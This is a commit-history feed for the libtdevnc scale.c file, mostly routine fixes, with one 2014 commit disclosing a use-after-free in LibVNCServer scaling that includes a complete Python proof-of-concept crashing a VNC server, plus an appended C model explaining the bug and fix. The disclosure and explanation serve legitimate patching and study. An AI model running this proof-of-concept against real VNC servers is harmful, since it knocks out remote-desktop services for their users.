<feed xmlns='http://www.w3.org/2005/Atom'>
<title>libtdevnc/libvncserver/scale.c, branch r14.1.4</title>
<subtitle>Shared TDE VNC library sources
</subtitle>
<id>https://scm.trinitydesktop.org/cgit/libtdevnc/atom?h=r14.1.4</id>
<link rel='self' href='https://scm.trinitydesktop.org/cgit/libtdevnc/atom?h=r14.1.4'/>
<link rel='alternate' type='text/html' href='https://scm.trinitydesktop.org/cgit/libtdevnc/'/>
<updated>2019-02-06T15:56:55Z</updated>
<entry>
<title>Merge tag 'LibVNCServer-0.9.12'</title>
<updated>2019-02-06T15:56:55Z</updated>
<author>
<name>Slávek Banko</name>
<email>slavek.banko@axis.cz</email>
</author>
<published>2019-02-06T15:56:55Z</published>
<link rel='alternate' type='text/html' href='https://scm.trinitydesktop.org/cgit/libtdevnc/commit/?id=f3f392caec43b4095bc1d84b315ed7972c13c144'/>
<id>urn:sha1:f3f392caec43b4095bc1d84b315ed7972c13c144</id>
<content type='text'>
Signed-off-by: Slávek Banko &lt;slavek.banko@axis.cz&gt;
</content>
</entry>
<entry>
<title>Removed _BSD_SOURCE, _SVID_SOURCE, _GNU_SOURCE, _XOPEN_SOURCE.</title>
<updated>2018-10-08T12:59:54Z</updated>
<author>
<name>Michele Calgaro</name>
<email>michele.calgaro@yahoo.it</email>
</author>
<published>2018-10-08T12:48:14Z</published>
<link rel='alternate' type='text/html' href='https://scm.trinitydesktop.org/cgit/libtdevnc/commit/?id=8c081c8888bccbf5adfe0fc4ec518e2cbfba9871'/>
<id>urn:sha1:8c081c8888bccbf5adfe0fc4ec518e2cbfba9871</id>
<content type='text'>
Signed-off-by: Michele Calgaro &lt;michele.calgaro@yahoo.it&gt;
</content>
</entry>
<entry>
<title>Fix building in C89 mode</title>
<updated>2017-02-20T19:47:42Z</updated>
<author>
<name>Christian Beier</name>
<email>dontmind@freeshell.org</email>
</author>
<published>2017-02-20T19:47:42Z</published>
<link rel='alternate' type='text/html' href='https://scm.trinitydesktop.org/cgit/libtdevnc/commit/?id=425e24196b7de15875d08c94c5ff59a6a3642654'/>
<id>urn:sha1:425e24196b7de15875d08c94c5ff59a6a3642654</id>
<content type='text'>
FIXME: this should probably be refactored into a common header.
</content>
</entry>
<entry>
<title>Fix some typos (found by codespell)</title>
<updated>2015-10-09T15:13:35Z</updated>
<author>
<name>Stefan Weil</name>
<email>sw@weilnetz.de</email>
</author>
<published>2015-10-09T15:13:35Z</published>
<link rel='alternate' type='text/html' href='https://scm.trinitydesktop.org/cgit/libtdevnc/commit/?id=9c7efb7633ba62cd80c93e83284663f805bb3031'/>
<id>urn:sha1:9c7efb7633ba62cd80c93e83284663f805bb3031</id>
<content type='text'>
Signed-off-by: Stefan Weil &lt;sw@weilnetz.de&gt;
</content>
</entry>
<entry>
<title>Fix Use-After-Free vulnerability in LibVNCServer wrt scaling.</title>
<updated>2014-10-21T15:33:28Z</updated>
<author>
<name>Christian Beier</name>
<email>dontmind@freeshell.org</email>
</author>
<published>2014-10-21T15:33:28Z</published>
<link rel='alternate' type='text/html' href='https://scm.trinitydesktop.org/cgit/libtdevnc/commit/?id=668d3e3785bef9ee9a887192ee37f043d0d3c2f4'/>
<id>urn:sha1:668d3e3785bef9ee9a887192ee37f043d0d3c2f4</id>
<content type='text'>
Reported by Ken Johnson &lt;Ken.Johnson1@telus.com&gt;.

The vulnerability would occur in both the rfbPalmVNCSetScaleFactor and rfbSetScale cases in the rfbProcessClientNormalMessage function of rfbserver.c. Sending a valid (non-zero) scaling factor is required:

      if (msg.ssc.scale == 0) {
          rfbLogPerror("rfbProcessClientNormalMessage: will not accept a scale factor of zero");
          rfbCloseClient(cl);
          return;
      }

      rfbStatRecordMessageRcvd(cl, msg.type, sz_rfbSetScaleMsg, sz_rfbSetScaleMsg);
      rfbLog("rfbSetScale(%d)\n", msg.ssc.scale);
      rfbScalingSetup(cl,cl-&gt;screen-&gt;width/msg.ssc.scale, cl-&gt;screen-&gt;height/msg.ssc.scale);

      rfbSendNewScaleSize(cl); &lt;&lt; This is the call that can trigger a free.
      return;

At the end of both cases there is a call to the rfbSendNewScaleSize function, where, if the connection is disconnected after the VNC scaling message is sent, a free can occur.

    else
    {
        rfbResizeFrameBufferMsg        rmsg;
        rmsg.type = rfbResizeFrameBuffer;
        rmsg.pad1=0;
        rmsg.framebufferWidth  = Swap16IfLE(cl-&gt;scaledScreen-&gt;width);
        rmsg.framebufferHeigth = Swap16IfLE(cl-&gt;scaledScreen-&gt;height);
        rfbLog("Sending a response to a UltraVNC style frameuffer resize event (%dx%d)\n", cl-&gt;scaledScreen-&gt;width, cl-&gt;scaledScreen-&gt;height);
        if (rfbWriteExact(cl, (char *)&amp;rmsg, sz_rfbResizeFrameBufferMsg) &lt; 0) {
            rfbLogPerror("rfbNewClient: write");
            rfbCloseClient(cl);
            rfbClientConnectionGone(cl); &lt;&lt; Call which can lead to a free.
            return FALSE;
        }
    }
    return TRUE;

Once this function returns, rfbClientConnectionGone is eventually called again on the return from rfbProcessClientNormalMessage. In the KRFB server this leads to an attempt to access client-&gt;data.

POC script to trigger the vulnerability:

---snip---

import socket,struct,sys

class RFB:

    INIT_3008 = "\x52\x46\x42\x20\x30\x30\x33\x2e\x30\x30\x38\x0a"
    AUTH_NO_PASS  = "\x01"
    AUTH_PASS = "\x02"
    SHARE_DESKTOP = "\x01"

    def AUTH_PROCESS(self,data,flag):
        if flag == 0:
            # Get security types: first byte is the count,
            # followed by one byte per offered type
            secTypeCount = ord(data[0])
            secType = {}
            for i in range(secTypeCount):
                secType[i] = data[1 + i]
            return secType
        elif flag == 1:
            # Get auth result
            # 0 means auth success
            # 1 means failure
            return data[3]

    def AUTH_PROCESS_CHALLENGE(self, data, PASSWORD):
        try:
            from Crypto.Cipher import DES
        except:
            print "Error importing crypto. Please fix or do not require authentication"
            sys.exit(1)
        # VNC auth uses the first 8 password bytes, zero-padded
        if len(PASSWORD) != 8:
            PASSWORD = PASSWORD[:8].ljust(8, '\0')

        # VNC DES key: the bit order of each password byte is reversed
        PASSWORD_SWAP = [self.reverse_bits(ord(c)) for c in PASSWORD]
        PASSWORD = struct.pack("8B", *PASSWORD_SWAP)
        crypto = DES.new(PASSWORD, DES.MODE_ECB)
        return crypto.encrypt(data)

    def reverse_bits(self,x):
        a=0
        for i in range(8):
            a += ((x&gt;&gt;i)&amp;1)&lt;&lt;(7-i)
        return a

def main(argv):

    print "Proof of Concept"
    print "Copyright TELUS Security Labs"
    print "All Rights Reserved.\n"

    try:
        HOST = sys.argv[1]
        PORT = int(sys.argv[2])
    except:
        print "Usage: python setscale_segv_poc.py &lt;host&gt; &lt;port&gt; [password]"
        sys.exit(1)
    try:
        PASSWORD = sys.argv[3]
    except:
        print "No password supplied"
        PASSWORD = ""

    vnc = RFB()

    remote = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    remote.connect((HOST,PORT))

    # Get server version
    data = remote.recv(1024)
    # Send 3.8 version
    remote.send(vnc.INIT_3008)
    # Get supported security types
    data = remote.recv(1024)
    # Process Security Message
    secType = vnc.AUTH_PROCESS(data,0)

    if secType[0] == "\x02":
        # Send accept for password auth
        remote.send(vnc.AUTH_PASS)
        # Get challenge
        data = remote.recv(1024)
        # Send challenge response
        remote.send(vnc.AUTH_PROCESS_CHALLENGE(data,PASSWORD))

    elif secType[0] == "\x01":
        # Send accept for None pass
        remote.send(vnc.AUTH_NO_PASS)

    else:
        print 'The server sent us something weird during auth.'
        sys.exit(1)

    # Get result
    data = remote.recv(1024)
    # Process result
    result = vnc.AUTH_PROCESS(data,1)

    if result == "\x01":
        # Authentication failure.
        data = remote.recv(1024)
        print 'Authentication failure. Server Reason: ' + str(data)
        sys.exit(1)

    elif result == "\x00":
        print "Authentication success."

    else:
        print 'Some other authentication issue occurred.'
        sys.exit(1)

    # Send ClientInit
    remote.send(vnc.SHARE_DESKTOP)

    # Send malicious message: rfbSetScale (type 8), scale factor 8,
    # two bytes of padding, then drop the connection immediately
    print "Sending malicious data..."
    remote.send("\x08\x08\x00\x00")
    remote.close()

if __name__ == "__main__":
    main(sys.argv)

---snap---
</content>
</entry>
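The teardown-ownership bug the commit message above describes, reduced to a runnable model. This is an added example, not code from the commit, from LibVNCServer or from libtdevnc: the Client struct, the uaf_events counter and the helper names are constructed stand-ins that only loosely mirror rfbCloseClient, rfbClientConnectionGone and rfbSendNewScaleSize. The "vuln" variant releases the client inside the callee on a write failure and the caller releases it again; the "fixed" variant only marks the socket closed and leaves teardown to the single owner.

```c
/*
 * Constructed model of the double-teardown bug (added example, not
 * LibVNCServer code). Names and structures are assumptions.
 */
#include "stdio.h"
#include "stdlib.h"

typedef struct {
    int sock;   /* -1 once closeClient ran */
    int freed;  /* 1 once connectionGone released the object */
} Client;

/* Counts teardowns of an already released object. In the real library
   the second call reads freed memory (cl->data in krfb). */
static int uaf_events = 0;

static void closeClient(Client *cl) { cl->sock = -1; }

static void connectionGone(Client *cl) {
    if (cl->freed) {
        uaf_events++;   /* second teardown: would be a use-after-free */
        return;
    }
    cl->freed = 1;      /* stands in for free(cl) */
}

/* write_ok models rfbWriteExact succeeding (1) or failing (0) */
static int sendNewScaleSize_vuln(Client *cl, int write_ok) {
    if (!write_ok) {
        closeClient(cl);
        connectionGone(cl);  /* callee frees what the caller still owns */
        return 0;
    }
    return 1;
}

static int sendNewScaleSize_fixed(Client *cl, int write_ok) {
    if (!write_ok) {
        closeClient(cl);     /* only mark closed; the caller tears down */
        return 0;
    }
    return 1;
}

/* Models the rfbSetScale branch of the message handler plus the outer
   loop that tears a client down once its socket is closed. Returns the
   number of use-after-free events this message caused, or -1 if the
   scale factor was rejected. */
static int handleSetScale(int scale, int write_ok, int use_fixed) {
    Client *cl = calloc(1, sizeof *cl);
    int before, result;
    cl->sock = 3;
    if (scale == 0) { free(cl); return -1; }  /* "will not accept ... zero" */
    before = uaf_events;
    if (use_fixed) sendNewScaleSize_fixed(cl, write_ok);
    else           sendNewScaleSize_vuln(cl, write_ok);
    /* outer loop: socket closed, so release the client exactly once */
    if (cl->sock == -1) connectionGone(cl);
    result = uaf_events - before;
    free(cl);
    return result;
}

int main(void) {
    printf("vulnerable, write fails: uaf events = %d\n", handleSetScale(8, 0, 0));
    printf("fixed, write fails:      uaf events = %d\n", handleSetScale(8, 0, 1));
    printf("vulnerable, write ok:    uaf events = %d\n", handleSetScale(8, 1, 0));
    return 0;
}
```

The model makes the trigger visible: the write only fails when the peer has already gone away, which is exactly what the proof of concept forces by sending the SetScale message and closing the socket at once. Under a real build, running the server under AddressSanitizer turns the counter increment into a reported heap-use-after-free.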
<entry>
<title>Make sure that no integer overflow could occur during scaling</title>
<updated>2014-10-06T18:13:00Z</updated>
<author>
<name>newsoft</name>
<email>newsoft@gmx.fr</email>
</author>
<published>2014-10-06T18:13:00Z</published>
<link rel='alternate' type='text/html' href='https://scm.trinitydesktop.org/cgit/libtdevnc/commit/?id=8220f4da4c4f42d8208f09346414f15121153da6'/>
<id>urn:sha1:8220f4da4c4f42d8208f09346414f15121153da6</id>
<content type='text'>
</content>
</entry>
<entry>
<title>Fix compilation in c89 mode.</title>
<updated>2011-04-28T09:42:59Z</updated>
<author>
<name>George Kiagiadakis</name>
<email>kiagiadakis.george@gmail.com</email>
</author>
<published>2010-11-10T18:57:13Z</published>
<link rel='alternate' type='text/html' href='https://scm.trinitydesktop.org/cgit/libtdevnc/commit/?id=35246edddd952a6d83511f69cba47536495e4700'/>
<id>urn:sha1:35246edddd952a6d83511f69cba47536495e4700</id>
<content type='text'>
Signed-off-by: Johannes Schindelin &lt;johannes.schindelin@gmx.de&gt;
</content>
</entry>
<entry>
<title>Cleanup: remove CORBA stuff.</title>
<updated>2010-09-13T12:17:43Z</updated>
<author>
<name>Christian Beier</name>
<email>dontmind@freeshell.org</email>
</author>
<published>2010-09-06T14:12:30Z</published>
<link rel='alternate' type='text/html' href='https://scm.trinitydesktop.org/cgit/libtdevnc/commit/?id=0df84e5c27eefad8b731b12d58f8fbede71823e0'/>
<id>urn:sha1:0df84e5c27eefad8b731b12d58f8fbede71823e0</id>
<content type='text'>
The header file and most of the functions referred to
do not exist in libvncserver.

Signed-off-by: Christian Beier &lt;dontmind@freeshell.org&gt;
</content>
</entry>
<entry>
<title>Add ZYWRLE server-side support (thanks Noriaki Yamazaki, Hitachi)</title>
<updated>2008-01-29T11:50:16Z</updated>
<author>
<name>dscho</name>
<email>dscho</email>
</author>
<published>2008-01-29T11:50:16Z</published>
<link rel='alternate' type='text/html' href='https://scm.trinitydesktop.org/cgit/libtdevnc/commit/?id=059afcdf819f63a5ac3a93ef3060fd172234ab82'/>
<id>urn:sha1:059afcdf819f63a5ac3a93ef3060fd172234ab82</id>
<content type='text'>
Signed-off-by: Johannes Schindelin &lt;johannes.schindelin@gmx.de&gt;
</content>
</entry>
<entry>
<title>The great UltraVNC Compatibility Commit</title>
<updated>2006-05-15T05:37:39Z</updated>
<author>
<name>steven_carr</name>
<email>steven_carr</email>
</author>
<published>2006-05-15T05:37:39Z</published>
<link rel='alternate' type='text/html' href='https://scm.trinitydesktop.org/cgit/libtdevnc/commit/?id=ccdbe8f3256c3c776a1cc1a0517a38437b9e2c65'/>
<id>urn:sha1:ccdbe8f3256c3c776a1cc1a0517a38437b9e2c65</id>
<content type='text'>
</content>
</entry>
</feed>
